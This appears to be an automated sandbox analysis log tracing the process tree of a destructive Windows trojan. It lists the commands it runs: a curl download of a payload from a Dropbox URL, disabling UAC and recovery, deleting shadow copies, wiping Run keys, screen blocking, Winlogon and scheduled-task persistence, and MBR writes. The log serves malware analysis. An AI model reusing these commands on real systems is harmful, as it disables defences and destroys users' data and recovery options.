C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\regfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\steamlink\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\steam\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\4.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\svgfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\themefile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\themepackfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\VBSFile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\xmlfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\WinRAR\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\Windows.VhdFile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f11⤵
- Modifies registry class
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\SearchFolder\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\Paint.Picture\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\mhtmlfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\inffile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\JSFile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\JSEFile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\ftp\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\Word.Document.8\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\Word.Document.12\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\Word.RTF.8\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\wordhtmlfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\wordhtmltemplate\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\wordmhtmlfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\Wordpad.Document.1\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\wordxmlfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\uTorrent\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f11⤵
-
C:\Windows\system32\ie4uinit.exeie4uinit.exe -show11⤵
- Modifies Installed Components in the registry
- Registers COM server for autorun
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Windows\system32\ie4uinit.exeie4uinit.exe -show7⤵
- Modifies Installed Components in the registry
- Registers COM server for autorun
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\java\protection\start\starthosts.exeC:\java\protection\start\starthosts.exe7⤵
- Checks computer location settings
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6D80.tmp\6D81.tmp\6D82.bat C:\java\protection\start\starthosts.exe"8⤵
-
C:\java\ban\hosts.exeC:\java\ban\hosts.exe9⤵
- Checks computer location settings
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6FA3.tmp\6FA4.tmp\6FA5.bat C:\java\ban\hosts.exe"10⤵
- Drops file in Drivers directory
-
C:\java\protection\start\startWPChanger.exeC:\java\protection\start\startWPChanger.exe7⤵
- Checks computer location settings
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6F36.tmp\6F37.tmp\6F38.bat C:\java\protection\start\startWPChanger.exe"8⤵
-
C:\java\Wallpaper\WPChanger.exeC:\java\Wallpaper\WPChanger.exe C:\java\Wallpaper\clown.png9⤵
- Sets desktop wallpaper using registry
- Modifies Control Panel
-
C:\java\clown.exeC:\java\clown.exe7⤵
- Checks computer location settings
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6F46.tmp\6F47.tmp\6F48.bat C:\java\clown.exe"8⤵
-
C:\java\protection\start\startvol.exeC:\java\protection\start\startvol.exe9⤵
- Checks computer location settings
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7282.tmp\7283.tmp\7284.bat C:\java\protection\start\startvol.exe"10⤵
-
C:\java\vol.exeC:\java\vol.exe11⤵
- Checks computer location settings
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7522.tmp\7523.tmp\7524.bat C:\java\vol.exe"12⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV113⤵
-
C:\Windows\system32\wscript.exewscript.exe "C:\java\vol.vbs"13⤵
-
C:\Windows\system32\wscript.exewscript.exe "C:\java\morgalka.vbs"13⤵
-
C:\java\protection\start\startScreenBlocker.exeC:\java\protection\start\startScreenBlocker.exe9⤵
- Checks computer location settings
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7291.tmp\7292.tmp\7293.bat C:\java\protection\start\startScreenBlocker.exe"10⤵
-
C:\java\ban\ScreenBlocker.exeC:\java\ban\ScreenBlocker.exe11⤵
-
C:\java\protection\start\startcur.exeC:\java\protection\start\startcur.exe9⤵
- Checks computer location settings
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\72C0.tmp\72C1.tmp\72C2.bat C:\java\protection\start\startcur.exe"10⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵
-
C:\java\ban\cur.exeC:\java\ban\cur.exe11⤵
-
C:\java\attention.exeC:\java\attention.exe9⤵
- Checks computer location settings
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\72D0.tmp\72D1.tmp\72D2.bat C:\java\attention.exe"10⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵
-
C:\java\form.exeC:\java\form.exe11⤵
-
C:\Windows\system32\timeout.exetimeout -t 10 -nobreak11⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\taskkill.exetaskkill -f -im form.exe11⤵
- Kills process with taskkill
-
C:\Windows\system32\ReAgentc.exereagentc /disable9⤵
- Drops file in Windows directory
-
C:\java\protection\start\startWinlog.exeC:\java\protection\start\startWinlog.exe9⤵
- Checks computer location settings
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\760C.tmp\760D.tmp\760E.bat C:\java\protection\start\startWinlog.exe"10⤵
-
C:\java\protection\Winlog.exeC:\java\protection\Winlog.exe11⤵
- Modifies WinLogon for persistence
-
C:\java\protection\start\startf.exeC:\java\protection\start\startf.exe9⤵
- Checks computer location settings
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\78CB.tmp\78DC.tmp\78DD.bat C:\java\protection\start\startf.exe"10⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵
-
C:\java\f\f.exeC:\java\f\f.exe11⤵
- Checks computer location settings
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7A90.tmp\7A91.tmp\7A92.bat C:\java\f\f.exe"12⤵
-
C:\java\protection\start\startban.exeC:\java\protection\start\startban.exe9⤵
- Checks computer location settings
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\78EA.tmp\78EB.tmp\78EC.bat C:\java\protection\start\startban.exe"10⤵
-
C:\java\ban\ban.exeC:\java\ban\ban.exe11⤵
-
C:\java\ban\ban.exeC:\java\ban\ban.exe12⤵
- Loads dropped DLL
-
C:\java\Wallpaper\engine\wp.exewp id9⤵
-
C:\java\Wallpaper\engine\wp.exewp run mpv --wid=132016 C:\java\Wallpaper\engine\wallpapers\1.mp4 --loop=inf --player-operation-mode=pseudo-gui --force-window=yes9⤵
-
C:\java\Wallpaper\engine\mpv.com"C:\java\Wallpaper\engine\mpv.com" "--wid=132016" "C:\java\Wallpaper\engine\wallpapers\1.mp4" "--loop=inf" "--player-operation-mode=pseudo-gui" "--force-window=yes"10⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵
-
C:\java\Wallpaper\engine\mpv.exe"C:\java\Wallpaper\engine\mpv.com" "--wid=132016" "C:\java\Wallpaper\engine\wallpapers\1.mp4" "--loop=inf" "--player-operation-mode=pseudo-gui" "--force-window=yes"11⤵
- Suspicious use of FindShellTrayWindow
-
C:\java\hide.exeC:\java\hide.exe9⤵
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\timeout.exetimeout -t 20 -nobreak9⤵
- Delays execution with timeout.exe
-
C:\java\hide.exeC:\java\hide.exe9⤵
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\timeout.exetimeout -t 20 -nobreak9⤵
- Delays execution with timeout.exe
-
C:\java\hide.exeC:\java\hide.exe9⤵
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\timeout.exetimeout -t 20 -nobreak9⤵
- Delays execution with timeout.exe
-
C:\java\hide.exeC:\java\hide.exe9⤵
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\timeout.exetimeout -t 13 -nobreak9⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\taskkill.exetaskkill -f -im mpv.exe9⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill -f -im mpv.com9⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill -f -im mpv.exe9⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill -f -im mpv.com9⤵
- Kills process with taskkill
-
C:\java\video\VideoPlayer.exeC:\java\video\VideoPlayer.exe C:\java\video\1.mp49⤵
- Enumerates connected drives
- Loads dropped DLL
-
C:\Windows\system32\taskkill.exetaskkill /F /IM VideoPlayer.exe9⤵
- Kills process with taskkill
-
C:\java\Wallpaper\engine\wp.exewp id9⤵
-
C:\java\Wallpaper\engine\wp.exewp run mpv --wid=132016 C:\java\Wallpaper\engine\wallpapers\2.mp4 --loop=inf --player-operation-mode=pseudo-gui --force-window=yes9⤵
- Checks computer location settings
-
C:\java\Wallpaper\engine\mpv.com"C:\java\Wallpaper\engine\mpv.com" "--wid=132016" "C:\java\Wallpaper\engine\wallpapers\2.mp4" "--loop=inf" "--player-operation-mode=pseudo-gui" "--force-window=yes"10⤵
-
C:\java\Wallpaper\engine\mpv.exe"C:\java\Wallpaper\engine\mpv.com" "--wid=132016" "C:\java\Wallpaper\engine\wallpapers\2.mp4" "--loop=inf" "--player-operation-mode=pseudo-gui" "--force-window=yes"11⤵
- Suspicious use of FindShellTrayWindow
-
C:\java\hide.exeC:\java\hide.exe9⤵
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\timeout.exetimeout -t 22 -nobreak9⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\taskkill.exetaskkill -f -im mpv.exe9⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill -f -im mpv.com9⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill -f -im mpv.exe9⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill -f -im mpv.com9⤵
- Kills process with taskkill
-
C:\java\video\VideoPlayer.exeC:\java\video\VideoPlayer.exe C:\java\video\2.mp49⤵
- Enumerates connected drives
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\taskkill.exetaskkill /F /IM VideoPlayer.exe9⤵
- Kills process with taskkill
-
C:\java\Wallpaper\engine\wp.exewp id9⤵
-
C:\java\Wallpaper\engine\wp.exewp run mpv --wid=132016 C:\java\Wallpaper\engine\wallpapers\3.mp4 --loop=inf --player-operation-mode=pseudo-gui --force-window=yes9⤵
- Checks computer location settings
-
C:\java\Wallpaper\engine\mpv.com"C:\java\Wallpaper\engine\mpv.com" "--wid=132016" "C:\java\Wallpaper\engine\wallpapers\3.mp4" "--loop=inf" "--player-operation-mode=pseudo-gui" "--force-window=yes"10⤵
-
C:\java\Wallpaper\engine\mpv.exe"C:\java\Wallpaper\engine\mpv.com" "--wid=132016" "C:\java\Wallpaper\engine\wallpapers\3.mp4" "--loop=inf" "--player-operation-mode=pseudo-gui" "--force-window=yes"11⤵
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\timeout.exetimeout -t 42 -nobreak9⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\taskkill.exetaskkill -f -im mpv.exe9⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill -f -im mpv.com9⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill -f -im mpv.exe9⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill -f -im mpv.com9⤵
- Kills process with taskkill
-
C:\java\video\VideoPlayer.exeC:\java\video\VideoPlayer.exe C:\java\video\3.mp49⤵
- Enumerates connected drives
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
C:\java\f.exeC:\java\f.exe9⤵
- Suspicious use of SetThreadContext
-
C:\java\f.exe"C:\java\f.exe"10⤵
- Adds Run key to start application
- Writes to the Master Boot Record (MBR)
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Create /TN "Windows Update" /ru SYSTEM /SC ONSTART /TR "C:\java\f.exe"11⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 51211⤵
- Program crash
-
C:\Users\Admin\Downloads\3MB Online Install.exe"C:\Users\Admin\Downloads\3MB Online Install.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\Drivers\Start.exe"C:\ProgramData\Drivers\Start.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3450.tmp\3451.tmp\3452.bat C:\ProgramData\Drivers\Start.exe"3⤵
-
C:\ProgramData\Drivers\curl.exeC:\ProgramData\Drivers\Curl.exe -L -o "C:\ProgramData\Drivers\Driver.exe" "https://www.dropbox.com/s/kws6z5mk9d0t52b/HD0Killer0Clown02.6.exe?dl=1"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\Drivers\Driver.exe"C:\ProgramData\Drivers\Driver.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\java\protection\clown.exe"C:\java\protection\clown.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4855.tmp\4856.tmp\4857.bat C:\java\protection\clown.exe"6⤵
-
C:\java\protection\start\startban.exeC:\java\protection\start\startban.exe7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4930.tmp\4931.tmp\4932.bat C:\java\protection\start\startban.exe"8⤵
-
C:\java\ban\ban.exeC:\java\ban\ban.exe9⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\java\ban\ban.exeC:\java\ban\ban.exe10⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\java\protection\def.exeC:\java\protection\def.exe7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4920.tmp\4921.tmp\4922.bat C:\java\protection\def.exe"8⤵
-
C:\java\protection\DisDef.exeC:\java\protection\DisDef.exe /D9⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\java\protection\start\startcur.exeC:\java\protection\start\startcur.exe7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\494F.tmp\4950.tmp\4951.bat C:\java\protection\start\startcur.exe"8⤵
-
C:\java\ban\cur.exeC:\java\ban\cur.exe9⤵
- Executes dropped EXE
-
C:\java\protection\start\startkey.exeC:\java\protection\start\startkey.exe7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4950.tmp\4950.tmp\4951.bat C:\java\protection\start\startkey.exe"8⤵
-
C:\java\ban\key.exeC:\java\ban\key.exe9⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4C2D.tmp\4C2E.tmp\4C2F.bat C:\java\ban\key.exe"10⤵
-
C:\Windows\system32\reg.exereg import C:\java\ban\key.reg11⤵
-
C:\Windows\system32\ReAgentc.exereagentc /disable7⤵
- Drops file in Windows directory
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete /nointeractive7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\java\zip\7z.exeC:\java\zip\7z.exe a -tzip -mx1 -r0 C:\ProgramData\WindowsVersion\archive.zip C:\java7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\java\protection\start\startdelstartup.exeC:\java\protection\start\startdelstartup.exe7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5351.tmp\5352.tmp\5353.bat C:\java\protection\start\startdelstartup.exe"8⤵
-
C:\java\protection\delstartup.exeC:\java\protection\delstartup.exe9⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\59D9.tmp\59DA.tmp\59DB.bat C:\java\protection\delstartup.exe"10⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /va /f11⤵
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /va /f11⤵
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run" /va /f11⤵
-
C:\java\protection\start\startuac.exeC:\java\protection\start\startuac.exe7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5380.tmp\5381.tmp\5382.bat C:\java\protection\start\startuac.exe"8⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
-
C:\java\protection\uac.exeC:\java\protection\uac.exe9⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\58C0.tmp\58C1.tmp\58C2.bat C:\java\protection\uac.exe"10⤵
-
C:\Windows\system32\reg.exereg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f11⤵
- UAC bypass
- Modifies registry key
-
C:\java\protection\start\startauto.exeC:\java\protection\start\startauto.exe7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\539F.tmp\53A0.tmp\53A1.bat C:\java\protection\start\startauto.exe"8⤵
-
C:\java\protection\auto.exeC:\java\protection\auto.exe9⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5BCD.tmp\5BCE.tmp\5BCF.bat C:\java\protection\auto.exe"10⤵
- Drops startup file
-
C:\java\protection\start\startWinlog.exeC:\java\protection\start\startWinlog.exe7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5390.tmp\5391.tmp\5392.bat C:\java\protection\start\startWinlog.exe"8⤵
-
C:\java\protection\Winlog.exeC:\java\protection\Winlog.exe9⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
-
C:\java\protection\start\startExplorerIcons.exeC:\java\protection\start\startExplorerIcons.exe7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5391.tmp\5391.tmp\5392.bat C:\java\protection\start\startExplorerIcons.exe"8⤵
-
C:\java\protection\ExplorerIcons.exeC:\java\protection\ExplorerIcons.exe9⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5891.tmp\5892.tmp\5893.bat C:\java\protection\ExplorerIcons.exe"10⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 1 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 2 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 3 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 4 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 5 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 6 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 7 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 8 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 9 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 10 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 11 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 12 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 13 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 14 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 15 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 16 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 17 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 18 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 19 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 20 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 21 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 22 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
